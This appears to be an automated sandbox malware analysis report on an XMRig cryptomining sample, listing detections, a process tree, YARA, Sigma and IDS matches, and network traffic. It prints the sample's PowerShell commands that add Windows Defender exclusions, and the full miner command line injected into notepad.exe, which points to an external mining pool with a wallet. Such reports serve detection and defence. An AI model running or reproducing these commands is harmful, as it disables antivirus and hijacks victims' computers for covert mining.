Create Interactive Tour

Windows Analysis Report
9d2h99wrj.exe

Overview

General Information

Sample name:9d2h99wrj.exe
Analysis ID:1589435
MD5:88848246ce109235a762fcd193210caa
SHA1:9bbe1f1ef018b4cf4f9b4df15bd0904ab4f2ff5e
SHA256:ae9bec259aef6380ed576361d588180e1850742708c24e60dc92fe07d0fb90c9
Tags:exeuser-JaffaCakes118
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Notepad Making Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • 9d2h99wrj.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\9d2h99wrj.exe" MD5: 88848246CE109235A762FCD193210CAA)
    • conhost.exe (PID: 6896 cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe" MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7124 cmdline: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6268 cmdline: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6644 cmdline: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • notepad.exe (PID: 7112 cmdline: C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.2939901627.0000000140751000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x45a1f0:$a1: mining.set_target
      • 0x454f38:$a2: XMRIG_HOSTNAME
      • 0x457018:$a3: Usage: xmrig [OPTIONS]
      • 0x454f10:$a4: XMRIG_VERSION
      00000001.00000003.1723490319.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000001.00000003.1723490319.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x45a1f0:$a1: mining.set_target
        • 0x454f38:$a2: XMRIG_HOSTNAME
        • 0x457018:$a3: Usage: xmrig [OPTIONS]
        • 0x454f10:$a4: XMRIG_VERSION
        Click to see the 57 entries
        SourceRuleDescriptionAuthorStrings
        5.2.notepad.exe.140000000.0.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          5.2.notepad.exe.140000000.0.raw.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x45b7b0:$a1: mining.set_target
          • 0x4564f8:$a2: XMRIG_HOSTNAME
          • 0x4585d8:$a3: Usage: xmrig [OPTIONS]
          • 0x4564d0:$a4: XMRIG_VERSION
          5.2.notepad.exe.140000000.0.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
          • 0x462df1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
          5.2.notepad.exe.140000000.0.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
          • 0x4633b0:$s1: %s/%s (Windows NT %lu.%lu
          • 0x4641f8:$s2: \Microsoft\Libs\WR64.sys
          • 0x464490:$s3: \\.\WinRing0_
          • 0x45a7d8:$s4: pool_wallet
          • 0x3fab98:$s5: cryptonight
          • 0x3faba8:$s5: cryptonight
          • 0x3fabb8:$s5: cryptonight
          • 0x3fabc8:$s5: cryptonight
          • 0x3fabe0:$s5: cryptonight
          • 0x3fabf0:$s5: cryptonight
          • 0x3fac00:$s5: cryptonight
          • 0x3fac18:$s5: cryptonight
          • 0x3fac28:$s5: cryptonight
          • 0x3fac40:$s5: cryptonight
          • 0x3fac58:$s5: cryptonight
          • 0x3fac68:$s5: cryptonight
          • 0x3fac78:$s5: cryptonight
          • 0x3fac88:$s5: cryptonight
          • 0x3faca0:$s5: cryptonight
          • 0x3facb8:$s5: cryptonight
          • 0x3facc8:$s5: cryptonight
          5.2.notepad.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            Click to see the 3 entries

            Bitcoin Miner

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth , CommandLine: C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth , CommandLine|base64offset|contains: "+~~), Image: C:\Windows\System32\notepad.exe, NewProcessName: C:\Windows\System32\notepad.exe, OriginalFileName: C:\Windows\System32\notepad.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6896, ParentProcessName: conhost.exe, ProcessCommandLine: C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth , ProcessId: 7112, ProcessName: notepad.exe

            System Summary

            barindex
            Source: Network ConnectionAuthor: EagleEye Team: Data: DestinationIp: 80.240.16.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\notepad.exe, Initiated: true, ProcessId: 7112, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, CommandLine: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6896, ParentProcessName: conhost.exe, ProcessCommandLine: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, ProcessId: 7124, ProcessName: cmd.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, CommandLine: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6896, ParentProcessName: conhost.exe, ProcessCommandLine: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, ProcessId: 7124, ProcessName: cmd.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" , CommandLine: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7124, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" , ProcessId: 6268, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-12T14:19:08.414148+010020362892Crypto Currency Mining Activity Detected192.168.2.4576991.1.1.153UDP
            2025-01-12T14:20:10.875041+010020362892Crypto Currency Mining Activity Detected192.168.2.4516651.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-12T14:19:06.623850+010028269302Crypto Currency Mining Activity Detected192.168.2.44973080.240.16.67443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 9d2h99wrj.exeAvira: detected
            Source: 9d2h99wrj.exeVirustotal: Detection: 59%Perma Link
            Source: 9d2h99wrj.exeReversingLabs: Detection: 60%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 9d2h99wrj.exeJoe Sandbox ML: detected

            Bitcoin Miner

            barindex
            Source: Yara matchFile source: 5.2.notepad.exe.140000000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.notepad.exe.140000000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2939901627.0000000140751000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1723490319.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2940501021.0000029C16C9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1724814684.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1725250855.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1716722476.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1728133802.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1719250078.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1725707198.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1720494097.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1721642429.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1718529689.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1717762873.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1718162267.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1735767118.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1729940880.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.1720010405.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6896, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 7112, type: MEMORYSTR
            Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
            Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
            Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
            Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
            Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
            Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WR64.sys.1.dr

            Networking

            barindex
            Source: C:\Windows\System32\notepad.exeNetwork Connect: 192.248.189.11 443Jump to behavior
            Source: C:\Windows\System32\notepad.exeNetwork Connect: 80.240.16.67 443Jump to behavior
            Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
            Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:57699 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:51665 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49730 -> 80.240.16.67:443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
            Source: WR64.sys.1.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
            Source: WR64.sys.1.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
            Source: WR64.sys.1.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
            Source: WR64.sys.1.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
            Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/benchmark/%s
            Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
            Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
            Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
